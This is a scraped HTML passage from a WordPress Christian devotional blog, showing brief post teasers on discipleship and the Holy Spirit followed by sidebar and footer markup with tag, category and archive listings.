<span>March 28, 2019</span> <p>There is a dual message here. I am not to lead astray the little ones in the Way of discipleship. &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/28/be-alert-if-you-see-your-friend-going-wrong-correct-him-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14932 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16376" class="post-16376 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-amazement tag-surprise tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/27/should-we-be-surprised-at-the-coming-of-the-holy-spirit/" rel="bookmark">Should we be surprised at the coming of the Holy&nbsp;Spirit?</a></h1> </header> <span>March 27, 2019</span> <p>Some days I am just flat out surprise at what God does through His Holy Spirit. I don’t see it &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/27/should-we-be-surprised-at-the-coming-of-the-holy-spirit/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16376 --> </div><!-- end clear-fix --> </div><!-- more-posts-inner --> </div><!-- more-posts --> <nav id="nav-below" class="clear-fix"> <div class="nav-previous"><a href="https://quotesthoughtsrandom.wordpress.com/page/2/" >&larr; Older posts</a></div> <div class="nav-next"></div> </nav><!-- #nav-below --> </div><!-- end #content --> </div><!-- end #primary --> <div id="secondary" class="widget-area" role="complementary"> <aside id="blog_subscription-2" class="sidebar-widget widget_blog_subscription jetpack_subscription_widget"><h1 class="widget-title"><label for="subscribe-field">Follow Blog via Email</label></h1> <form action="https://subscribe.wordpress.com" method="post" accept-charset="utf-8" id="subscribe-blog"> <p>Enter your email address to follow this blog and receive notifications of new posts by email.</p> <p>Join 9,107 other followers</p> <p><input type="text" name="email" style="width: 95%; padding: 1px 2px" placeholder="Enter your email address" value="" id="subscribe-field"/></p> <p> <input type="hidden" name="action" value="subscribe"/> <input type="hidden" name="blog_id" value="64716440"/> <input type="hidden" name="source" value="https://quotesthoughtsrandom.wordpress.com/"/> <input type="hidden" name="sub-type" value="widget"/> <input type="hidden" name="redirect_fragment" value="blog_subscription-2"/> <input type="hidden" id="_wpnonce" name="_wpnonce" value="63c975b799" /> <button type="submit" > Follow </button> </p> </form> </aside><aside id="top-posts-4" class="sidebar-widget widget_top-posts"><h1 class="widget-title">Top Posts &amp; Pages</h1><ul class='widgets-list-layout no-grav'> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/" title="God is good and in a good mood. Laura&#039;s story proves it!" class="bump-view" data-bump-view="tp"> <img width="40" height="40" src="https://i0.wp.com/upload.wikimedia.org/wikipedia/commons/thumb/2/21/Hurricane_sandy_nasa_satelite_time_lapse_video.ogv/220px--Hurricane_sandy_nasa_satelite_time_lapse_video.ogv.jpg?resize=40%2C40&#038;ssl=1" class='widgets-list-layout-blavatar' alt="God is good and in a good mood. Laura&#039;s story proves it!" data-pin-nopin="true" /> </a> <div class="widgets-list-layout-links"> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/" class="bump-view" data-bump-view="tp"> God is good and in a good mood. Laura&#039;s story proves it! </a> </div> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/" title="“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.” ~Jesus" class="bump-view" data-bump-view="tp"> <img width="40" height="40" src="https://quotesthoughtsrandom.files.wordpress.com/2013/10/anger.jpg?w=150&#038;resize=40%2C40" class='widgets-list-layout-blavatar' alt="“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.” ~Jesus" data-pin-nopin="true" /> </a> <div class="widgets-list-layout-links"> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/" class="bump-view" data-bump-view="tp"> “He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.” ~Jesus </a> </div> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2018/07/17/heaven-is-it-a-real-destination-after-death/" title="Heaven -- Is it a Real Destination after Death?" class="bump-view" data-bump-view="tp"> <img width="40" height="40" src="https://i1.wp.com/i.pinimg.com/originals/a8/ce/f1/a8cef12e365f6474e44e8af606a14eb1.jpg?resize=40%2C40&#038;ssl=1" class='widgets-list-layout-blavatar' alt="Heaven -- Is it a Real Destination after Death?" data-pin-nopin="true" /> </a> <div class="widgets-list-layout-links"> <a href="https://quotesthoughtsrandom.wordpress.com/2018/07/17/heaven-is-it-a-real-destination-after-death/" class="bump-view" data-bump-view="tp"> Heaven -- Is it a Real Destination after Death? </a> </div> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/" title="&quot;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&quot; ~King Solomon" class="bump-view" data-bump-view="tp"> <img width="40" height="40" src="https://quotesthoughtsrandom.files.wordpress.com/2018/10/jesus-teaching.jpg?resize=40%2C40" class='widgets-list-layout-blavatar' alt="&quot;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&quot; ~King Solomon" data-pin-nopin="true" /> </a> <div class="widgets-list-layout-links"> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/" class="bump-view" data-bump-view="tp"> &quot;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&quot; ~King Solomon </a> </div> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2014/07/21/fred-flintstone-quotes/" title="Fred Flintstone Quotes" class="bump-view" data-bump-view="tp"> <img width="40" height="40" src="https://i1.wp.com/i2.photobucket.com/albums/y1/d00ltaz/fred_flintstone_and_barney_rubble.jpg?resize=40%2C40" class='widgets-list-layout-blavatar' alt="Fred Flintstone Quotes" data-pin-nopin="true" /> </a> <div class="widgets-list-layout-links"> <a href="https://quotesthoughtsrandom.wordpress.com/2014/07/21/fred-flintstone-quotes/" class="bump-view" data-bump-view="tp"> Fred Flintstone Quotes </a> </div> </li> </ul> </aside><aside id="wp_tag_cloud-2" class="sidebar-widget wp_widget_tag_cloud"><h1 class="widget-title">Tags</h1><div style="overflow:hidden"><a href="https://quotesthoughtsrandom.wordpress.com/tag/anger/" class="tag-cloud-link tag-link-2339 tag-link-position-1" style="font-size: 10.333333333333pt;" aria-label="Anger (122 items)">Anger</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/apostle-paul-sayings/" class="tag-cloud-link tag-link-159202464 tag-link-position-2" style="font-size: 13.173913043478pt;" aria-label="Apostle Paul Sayings (231 items)">Apostle Paul Sayings</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/faith/" class="tag-cloud-link tag-link-401 tag-link-position-3" style="font-size: 11.95652173913pt;" aria-label="Faith (177 items)">Faith</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/family/" class="tag-cloud-link tag-link-406 tag-link-position-4" style="font-size: 12.768115942029pt;" aria-label="Family (213 items)">Family</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/freedom/" class="tag-cloud-link tag-link-5648 tag-link-position-5" style="font-size: 8pt;" aria-label="Freedom (72 items)">Freedom</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/friend/" class="tag-cloud-link tag-link-5768 tag-link-position-6" style="font-size: 12.768115942029pt;" aria-label="Friend (211 items)">Friend</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/gods-goal/" class="tag-cloud-link tag-link-4638268 tag-link-position-7" style="font-size: 9.2173913043478pt;" aria-label="God&#039;s Goal (94 items)">God&#039;s Goal</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/god-is-god/" class="tag-cloud-link tag-link-3123732 tag-link-position-8" style="font-size: 10.333333333333pt;" aria-label="God is God (121 items)">God is God</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/god-is-good/" class="tag-cloud-link tag-link-58915 tag-link-position-9" style="font-size: 9.6231884057971pt;" aria-label="God is Good (103 items)">God is Good</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/good-news/" class="tag-cloud-link tag-link-47051 tag-link-position-10" style="font-size: 13.579710144928pt;" aria-label="Good News (255 items)">Good News</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/heal/" class="tag-cloud-link tag-link-347566 tag-link-position-11" style="font-size: 11.04347826087pt;" aria-label="Heal (145 items)">Heal</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/heaven/" class="tag-cloud-link tag-link-91914 tag-link-position-12" style="font-size: 15pt;" aria-label="Heaven (357 items)">Heaven</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/holy-spirit/" class="tag-cloud-link tag-link-33380 tag-link-position-13" style="font-size: 8.304347826087pt;" aria-label="Holy Spirit (77 items)">Holy Spirit</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/israel/" class="tag-cloud-link tag-link-9937 tag-link-position-14" style="font-size: 8.7101449275362pt;" aria-label="Israel (84 items)">Israel</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/jesus/" class="tag-cloud-link tag-link-8329 tag-link-position-15" style="font-size: 22pt;" aria-label="Jesus (1,726 items)">Jesus</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/jesus-sayings/" class="tag-cloud-link tag-link-18171825 tag-link-position-16" style="font-size: 17.840579710145pt;" aria-label="Jesus Sayings (681 items)">Jesus Sayings</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/joy/" class="tag-cloud-link tag-link-5840 tag-link-position-17" style="font-size: 13.275362318841pt;" aria-label="Joy (240 items)">Joy</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/kindness/" class="tag-cloud-link tag-link-3723 tag-link-position-18" style="font-size: 9.7246376811594pt;" aria-label="Kindness (105 items)">Kindness</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/kingdom/" class="tag-cloud-link tag-link-128790 tag-link-position-19" style="font-size: 13.782608695652pt;" aria-label="Kingdom (271 items)">Kingdom</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/kingdom-of-god/" class="tag-cloud-link tag-link-115341 tag-link-position-20" style="font-size: 14.086956521739pt;" aria-label="Kingdom of God (289 items)">Kingdom of God</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/king-solomon/" class="tag-cloud-link tag-link-365906 tag-link-position-21" style="font-size: 9.7246376811594pt;" aria-label="King Solomon (105 items)">King Solomon</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/love/" class="tag-cloud-link tag-link-3785 tag-link-position-22" style="font-size: 19.057971014493pt;" aria-label="Love (887 items)">Love</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/matthew-5/" class="tag-cloud-link tag-link-1322483 tag-link-position-23" style="font-size: 9.6231884057971pt;" aria-label="Matthew 5 (104 items)">Matthew 5</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/messiah/" class="tag-cloud-link tag-link-135627 tag-link-position-24" style="font-size: 14.492753623188pt;" aria-label="Messiah (314 items)">Messiah</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/miracle/" class="tag-cloud-link tag-link-33779 tag-link-position-25" style="font-size: 11.449275362319pt;" aria-label="Miracle (158 items)">Miracle</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/obedience/" class="tag-cloud-link tag-link-39122 tag-link-position-26" style="font-size: 10.028985507246pt;" aria-label="Obedience (115 items)">Obedience</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/obey/" class="tag-cloud-link tag-link-317796 tag-link-position-27" style="font-size: 8.7101449275362pt;" aria-label="Obey (85 items)">Obey</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/peace/" class="tag-cloud-link tag-link-2128 tag-link-position-28" style="font-size: 12.159420289855pt;" aria-label="Peace (185 items)">Peace</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/praise/" class="tag-cloud-link tag-link-5796 tag-link-position-29" style="font-size: 9.8260869565217pt;" aria-label="Praise (109 items)">Praise</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/reward/" class="tag-cloud-link tag-link-182466 tag-link-position-30" style="font-size: 8.6086956521739pt;" aria-label="Reward (82 items)">Reward</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/sick/" class="tag-cloud-link tag-link-24906 tag-link-position-31" style="font-size: 10.942028985507pt;" aria-label="Sick (140 items)">Sick</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/teachings/" class="tag-cloud-link tag-link-110755 tag-link-position-32" style="font-size: 15.405797101449pt;" aria-label="Teachings (392 items)">Teachings</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/truth/" class="tag-cloud-link tag-link-106 tag-link-position-33" style="font-size: 13.275362318841pt;" aria-label="Truth (239 items)">Truth</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/wisdom/" class="tag-cloud-link tag-link-15201 tag-link-position-34" style="font-size: 8.9130434782609pt;" aria-label="Wisdom (89 items)">Wisdom</a> <a href="https://quotesthoughtsrandom.wordpress.com/tag/wise-sayings/" class="tag-cloud-link tag-link-229059 tag-link-position-35" style="font-size: 13.173913043478pt;" aria-label="Wise Sayings (235 items)">Wise Sayings</a></div></aside> <aside id="recent-posts-4" class="sidebar-widget widget_recent_entries"> <h1 class="widget-title">Recent Posts</h1> <ul> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/">&#8220;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&#8221; ~King&nbsp;Solomon</a> <span class="post-date">May 16, 2019</span> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/">God is good and in a good mood. Laura&#8217;s story proves&nbsp;it!</a> <span class="post-date">May 15, 2019</span> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/">“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.”&nbsp;~Jesus</a> <span class="post-date">May 15, 2019</span> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/how-do-we-show-respect-for-gods-name/">How do we show respect for God’s&nbsp;name?</a> <span class="post-date">May 14, 2019</span> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/those-who-put-their-trust-in-the-master-were-added-right-and-left-men-and-women-both-luke/">&#8220;Those who put their trust in the Master were added right and left, men and women both.&#8221;&nbsp;~Luke</a> <span class="post-date">May 14, 2019</span> </li> </ul> </aside><aside id="categories-3" class="sidebar-widget widget_categories"><h1 class="widget-title">Categories</h1><form action="https://quotesthoughtsrandom.wordpress.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select name='cat' id='cat' class='postform' > <option value='-1'>Select Category</option> <option class="level-0" value="52579">God Thoughts&nbsp;&nbsp;(2,503)</option> <option class="level-1" value="852225">&nbsp;&nbsp;&nbsp;Digital Ministry&nbsp;&nbsp;(11)</option> <option class="level-1" value="3123732">&nbsp;&nbsp;&nbsp;God is God&nbsp;&nbsp;(571)</option> <option class="level-1" value="58915">&nbsp;&nbsp;&nbsp;God is Good&nbsp;&nbsp;(556)</option> <option class="level-1" value="392036">&nbsp;&nbsp;&nbsp;God is Great&nbsp;&nbsp;(85)</option> <option class="level-1" value="4638268">&nbsp;&nbsp;&nbsp;God&#8217;s Goal&nbsp;&nbsp;(789)</option> <option class="level-1" value="1481">&nbsp;&nbsp;&nbsp;Personal Thoughts&nbsp;&nbsp;(47)</option> <option class="level-1" value="110755">&nbsp;&nbsp;&nbsp;Teachings&nbsp;&nbsp;(411)</option> <option class="level-1" value="1">&nbsp;&nbsp;&nbsp;Uncategorized&nbsp;&nbsp;(15)</option> <option class="level-0" value="422">Poetry&nbsp;&nbsp;(7)</option> <option class="level-0" value="755">Quotes&nbsp;&nbsp;(526)</option> <option class="level-0" value="130260">Vault&nbsp;&nbsp;(15)</option> <option class="level-1" value="1173184">&nbsp;&nbsp;&nbsp;2014&nbsp;&nbsp;(15)</option> </select> </form> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { dropdown.parentNode.submit(); } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> </aside><aside id="archives-6" class="sidebar-widget widget_archive"><h1 class="widget-title">Archives</h1> <label class="screen-reader-text" for="archives-dropdown-6">Archives</label> <select id="archives-dropdown-6" name="archive-dropdown"> <option value="">Select Month</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/05/'> May 2019 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/04/'> April 2019 &nbsp;(60)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/03/'> March 2019 &nbsp;(64)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/02/'> February 2019 &nbsp;(67)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/01/'> January 2019 &nbsp;(67)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/12/'> December 2018 &nbsp;(65)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/11/'> November 2018 &nbsp;(61)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/10/'> October 2018 &nbsp;(63)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/09/'> September 2018 &nbsp;(63)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/08/'> August 2018 &nbsp;(69)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/07/'> July 2018 &nbsp;(70)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/06/'> June 2018 &nbsp;(64)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/05/'> May 2018 &nbsp;(76)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/04/'> April 2018 &nbsp;(65)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/03/'> March 2018 &nbsp;(52)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/02/'> February 2018 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/01/'> January 2018 &nbsp;(42)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/12/'> December 2017 &nbsp;(36)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/11/'> November 2017 &nbsp;(33)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/10/'> October 2017 &nbsp;(33)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/09/'> September 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/08/'> August 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/07/'> July 2017 &nbsp;(38)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/06/'> June 2017 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/05/'> May 2017 &nbsp;(35)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/04/'> April 2017 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/03/'> March 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/02/'> February 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/01/'> January 2017 &nbsp;(32)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/12/'> December 2016 &nbsp;(37)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/11/'> November 2016 &nbsp;(38)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/10/'> October 2016 &nbsp;(37)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/09/'> September 2016 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/08/'> August 2016 &nbsp;(39)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/07/'> July 2016 &nbsp;(30)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/06/'> June 2016 &nbsp;(32)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/05/'> May 2016 &nbsp;(32)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/04/'> April 2016 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/03/'> March 2016 &nbsp;(35)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/02/'> February 2016 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/01/'> January 2016 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/12/'> December 2015 &nbsp;(58)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/11/'> November 2015 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/10/'> October 2015 &nbsp;(50)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/09/'> September 2015 &nbsp;(54)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/08/'> August 2015 &nbsp;(49)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/07/'> July 2015 &nbsp;(43)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/06/'> June 2015 &nbsp;(54)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/05/'> May 2015 &nbsp;(57)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/04/'> April 2015 &nbsp;(55)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/03/'> March 2015 &nbsp;(55)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/02/'> February 2015 &nbsp;(53)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/01/'> January 2015 &nbsp;(81)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/12/'> December 2014 &nbsp;(77)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/11/'> November 2014 &nbsp;(60)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/10/'> October 2014 &nbsp;(41)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/09/'> September 2014 &nbsp;(46)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/08/'> August 2014 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/07/'> July 2014 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/06/'> June 2014 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/05/'> May 2014 &nbsp;(53)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/04/'> April 2014 &nbsp;(70)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/03/'> March 2014 &nbsp;(16)</option> </select> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "archives-dropdown-6" ); function onSelectChange() { if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) { document.location.href = this.options[ this.selectedIndex ].value; } } dropdown.onchange = onSelectChange; })(); /* ]]> */ </script> </aside> <div class="wpcnt"> <div class="wpa wpwidesky"> <span class="wpa-about">Advertisements</span> <div class="u"> <div style="padding-bottom:15px;width:160px;height:600px;"> <div id="atatags-286348-5cdd8c3d42b6e"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-286348-5cdd8c3d42b6e', { collapseEmpty: 'before', sectionId: '286348', location: 140, width: 160, height: 600 }); }); </script> </div> </div> </div> </div> </div> </div><!-- #secondary .widget-area --> </div><!-- end #main --> </div><!-- end #page-inner --> <footer id="colophon" role="contentinfo"> <div id="footer"> <div id="footer-inner"> <div id="footer-inner-inner"> <div id="upper-footer-widgets" class="clear-fix"> <aside id="recent-posts-2" class="footer-widget widget_recent_entries clear-fix"> <h1>Recent Posts</h1> <ul> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/">&#8220;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&#8221; ~King&nbsp;Solomon</a> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/">God is good and in a good mood. Laura&#8217;s story proves&nbsp;it!</a> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/">“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.”&nbsp;~Jesus</a> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/how-do-we-show-respect-for-gods-name/">How do we show respect for God’s&nbsp;name?</a> </li> <li> <a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/those-who-put-their-trust-in-the-master-were-added-right-and-left-men-and-women-both-luke/">&#8220;Those who put their trust in the Master were added right and left, men and women both.&#8221;&nbsp;~Luke</a> </li> </ul> </aside><aside id="archives-2" class="footer-widget widget_archive clear-fix"><h1>Archives</h1> <label class="screen-reader-text" for="archives-dropdown-2">Archives</label> <select id="archives-dropdown-2" name="archive-dropdown"> <option value="">Select Month</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/05/'> May 2019 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/04/'> April 2019 &nbsp;(60)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/03/'> March 2019 &nbsp;(64)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/02/'> February 2019 &nbsp;(67)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2019/01/'> January 2019 &nbsp;(67)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/12/'> December 2018 &nbsp;(65)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/11/'> November 2018 &nbsp;(61)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/10/'> October 2018 &nbsp;(63)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/09/'> September 2018 &nbsp;(63)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/08/'> August 2018 &nbsp;(69)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/07/'> July 2018 &nbsp;(70)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/06/'> June 2018 &nbsp;(64)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/05/'> May 2018 &nbsp;(76)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/04/'> April 2018 &nbsp;(65)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/03/'> March 2018 &nbsp;(52)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/02/'> February 2018 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2018/01/'> January 2018 &nbsp;(42)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/12/'> December 2017 &nbsp;(36)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/11/'> November 2017 &nbsp;(33)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/10/'> October 2017 &nbsp;(33)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/09/'> September 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/08/'> August 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/07/'> July 2017 &nbsp;(38)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/06/'> June 2017 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/05/'> May 2017 &nbsp;(35)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/04/'> April 2017 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/03/'> March 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/02/'> February 2017 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2017/01/'> January 2017 &nbsp;(32)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/12/'> December 2016 &nbsp;(37)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/11/'> November 2016 &nbsp;(38)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/10/'> October 2016 &nbsp;(37)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/09/'> September 2016 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/08/'> August 2016 &nbsp;(39)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/07/'> July 2016 &nbsp;(30)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/06/'> June 2016 &nbsp;(32)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/05/'> May 2016 &nbsp;(32)</option> <option 